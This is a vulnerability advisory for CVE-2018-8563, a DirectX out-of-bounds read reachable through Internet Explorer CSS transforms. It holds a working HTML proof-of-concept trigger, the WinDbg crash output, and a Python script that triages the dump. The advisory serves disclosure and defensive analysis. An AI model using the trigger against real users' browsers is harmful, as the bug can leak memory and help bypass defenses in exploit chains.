Microsoft DirectX Memory Corruption (CVE-2018-8563)

Nov 14 2018

A memory corruption vulnerability exists in Microsoft DirectX. The corruption happens as a result of the incorrect handling of text while running CSS transformations, resulting in an out-of-bounds read. It is possible to trigger this vulnerability remotely via Internet Explorer. An attacker can use this vulnerability to disclose memory of a victim's machine. Generally, such a vulnerability is chained with a remote code execution vulnerability and used to bypass common defenses.

Date Released: 14/11/2018
CVE: CVE-2018-8563
Author: Scott Bell
Vendor Website: http://www.microsoft.com/
Affected Software: Microsoft DirectX

Proof of Concept

The following HTML files can be used to reproduce the vulnerability:

parent.html

<html>
<iframe height="400" width="400" src="child.html"></iframe>
</html>

child.html

<html>
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<script>
function fuzz(){
try{bdo_element = document.createElement("bdo")}catch(e){}
try{document.body.appendChild(bdo_element);}catch(e){}
try { bdo_element.runtimeStyle.cssText = "box-shadow:3ch 1 2147483649rem 1 ;"}catch (e){}
try { bdo_element.innerText="&#8113;&#3453;&#7307;&#8779;&#2205;&#0875;&#4500;&#6192;&#9052;&#6115;"}catch (e){}
}
</script>
</head>
<body style="transform: scaleX(5) matrix(-6,6133979,0,7,5,-256);" onload='fuzz();'>
</body>
</html>

Executing the above HTML in Internet Explorer with a debugger attached results in the following crash:

(444.808): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=06fbb4d9 ebx=00000031 ecx=f9000002 edx=064f0080 esi=06381fa0 edi=05f87f60
eip=7ff984a3 esp=0477e860 ebp=0477ea10 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
7ff984a3 660f3a22048a01  pinsrd  xmm0,dword ptr [edx+ecx*4],1 ds:0023:ea4f0088=????????
1:031> k
ChildEBP RetAddr  
WARNING: Frame IP not in any known module. Following frames may be wrong.
0477ea10 7ff98011 0x7ff984a3
0477ea2c 6731e5a8 0x7ff98011
0477ea38 6731e0e6 D3D10Warp!ProcessorThreadSpecificData::ExecuteProgram_JIT+0x18
0477ea58 6731eaa0 D3D10Warp!ProcessorThreadSpecificData::ProcessPixels+0xd6
0477eac0 672f26c7 D3D10Warp!PixelJITProcessor::ProcessPixels+0x30
0477eadc 672f22f8 D3D10Warp!PixelJITGeometryRasterizer::Flush+0x97
0477eb14 67363aa9 D3D10Warp!PixelJITGeometryRasterizer::RasterizeComplexScan+0x48
0477eb34 67363a2e D3D10Warp!CAntialiasedFiller::GenerateOutput+0x39
0477eb68 67363383 D3D10Warp!CAntialiasedFiller::FillEdges+0x5de
0477ebb0 67362efa D3D10Warp!CAntialiasedFiller::RasterizeEdges+0x323
0477f6e0 672f2255 D3D10Warp!WarpGeometry::Rasterize+0x24a
0477f6fc 672f27e8 D3D10Warp!PixelJITGeometryRasterizer::Rasterize+0xe5
0477f784 672cb956 D3D10Warp!PixelJITRasterizeGeometry+0xe8
0477f7d4 672cad05 D3D10Warp!RasterizationStage::Rasterize_GEOMETRY+0x276
0477f7f4 672cac85 D3D10Warp!RasterizationStage::RasterizeBufferNoPixelShader+0x45
0477f818 672c7513 D3D10Warp!RasterizationStage::RasterizeBuffer+0xc5
0477f850 672de7d2 D3D10Warp!Task_Rasterize+0x253
0477f980 672de4ec D3D10Warp!Task::ExecuteTask+0x132
0477f998 76f326c5 D3D10Warp!ThreadPool::WorkCallBack+0x6c
0477f9bc 76f506d0 ntdll!TppWorkpExecuteCallback+0x10f
0477fb0c 7673efac ntdll!TppWorkerThread+0x562
0477fb18 76f83628 kernel32!BaseThreadInitThunk+0xe
0477fb58 76f835fb ntdll!__RtlUserThreadStart+0x70
0477fb70 00000000 ntdll!_RtlUserThreadStart+0x1b
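The crash output above carries enough information to confirm the out-of-bounds read without re-running the proof of concept: the faulting instruction reads `dword ptr [edx+ecx*4]`, the register dump gives `edx` and `ecx`, and the `k` output shows the faulting `eip` sits in code that belongs to no loaded module, just above `D3D10Warp!...ExecuteProgram_JIT`. The following script is an added triage example, not part of the advisory; it parses a constructed excerpt of the advisory's own WinDbg output, recomputes the effective address with 32-bit wraparound to check it against the `ds:0023:ea4f0088` WinDbg reported, interprets the index register as a signed offset to show how far outside the buffer the read landed, and counts how many top stack frames have no module symbol. The function and variable names are mine.

```python
import re

# Constructed excerpt of the WinDbg output in this advisory (register dump,
# faulting instruction and the top of the `k` stack trace). The values are
# the advisory's; only the trimming is mine.
CRASH_DUMP = """\
(444.808): Access violation - code c0000005 (first chance)
eax=06fbb4d9 ebx=00000031 ecx=f9000002 edx=064f0080 esi=06381fa0 edi=05f87f60
eip=7ff984a3 esp=0477e860 ebp=0477ea10 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
7ff984a3 660f3a22048a01  pinsrd  xmm0,dword ptr [edx+ecx*4],1 ds:0023:ea4f0088=????????
1:031> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
0477ea10 7ff98011 0x7ff984a3
0477ea2c 6731e5a8 0x7ff98011
0477ea38 6731e0e6 D3D10Warp!ProcessorThreadSpecificData::ExecuteProgram_JIT+0x18
0477ea58 6731eaa0 D3D10Warp!ProcessorThreadSpecificData::ProcessPixels+0xd6
"""

MASK32 = 0xFFFFFFFF

# Matches the "[base+index*scale],imm ds:sel:addr=value" tail of the faulting line.
FAULT_RE = re.compile(
    r"\[(e[a-z]{2})\+(e[a-z]{2})\*(\d)\],\d+\s+ds:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)")


def parse_registers(dump):
    """Map 32-bit register names (eax, ecx, eip, ...) to their values."""
    return {name: int(val, 16)
            for name, val in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", dump)}


def parse_fault(dump):
    """Pull the scaled-index memory operand and the address/value WinDbg printed."""
    m = FAULT_RE.search(dump)
    if m is None:
        raise ValueError("no [base+index*scale] memory operand found")
    base, index, scale, reported, value = m.groups()
    return {"base": base, "index": index, "scale": int(scale),
            "reported": int(reported, 16),
            # "????????" means the debugger could not read the target: unmapped memory.
            "unmapped": value.startswith("?")}


def signed32(value):
    """Interpret a 32-bit register value as a signed integer."""
    return value - (1 << 32) if value & 0x80000000 else value


def effective_address(regs, fault):
    """Recompute base + index*scale with 32-bit wraparound, as the CPU did."""
    return (regs[fault["base"]] + regs[fault["index"]] * fault["scale"]) & MASK32


def unresolved_top_frames(dump):
    """Count leading `k` frames printed as a raw 0x... address (no module symbol)
    and return the first frame that did resolve to a module."""
    frames = re.findall(r"^[0-9a-f]{8} [0-9a-f]{8} (\S+)", dump, re.M)
    count = 0
    for sym in frames:
        if not sym.startswith("0x"):
            break
        count += 1
    first_symbolized = next((s for s in frames if not s.startswith("0x")), None)
    return count, first_symbolized


def triage(dump):
    """Summarise the crash: where the read went, how far off the base it was,
    whether the target was mapped, and what code was executing."""
    regs = parse_registers(dump)
    fault = parse_fault(dump)
    ea = effective_address(regs, fault)
    index = signed32(regs[fault["index"]])
    unresolved, first_symbol = unresolved_top_frames(dump)
    return {
        "effective_address": ea,
        "matches_reported": ea == fault["reported"],
        "index_signed": index,
        "byte_offset_from_base": index * fault["scale"],
        "read_of_unmapped_memory": fault["unmapped"],
        "frames_without_module": unresolved,
        "first_symbolized_frame": first_symbol,
    }


if __name__ == "__main__":
    for key, val in triage(CRASH_DUMP).items():
        print(f"{key}: {val:#x}" if key == "effective_address" else f"{key}: {val}")
```

Run as-is, the script reports that `edx + ecx*4` wraps to `0xea4f0088`, exactly the address WinDbg printed, that `ecx` as a signed index is about -117 million (roughly 448 MiB before the base pointer), that the target was unmapped, and that the two innermost frames have no module symbol before the stack reaches `D3D10Warp`, consistent with a read from JIT-generated pixel-processing code in the software rasterizer. A negative, implausibly large index like this is the signature a triage analyst looks for when deciding whether an access violation is a bounds defect rather than a simple null dereference.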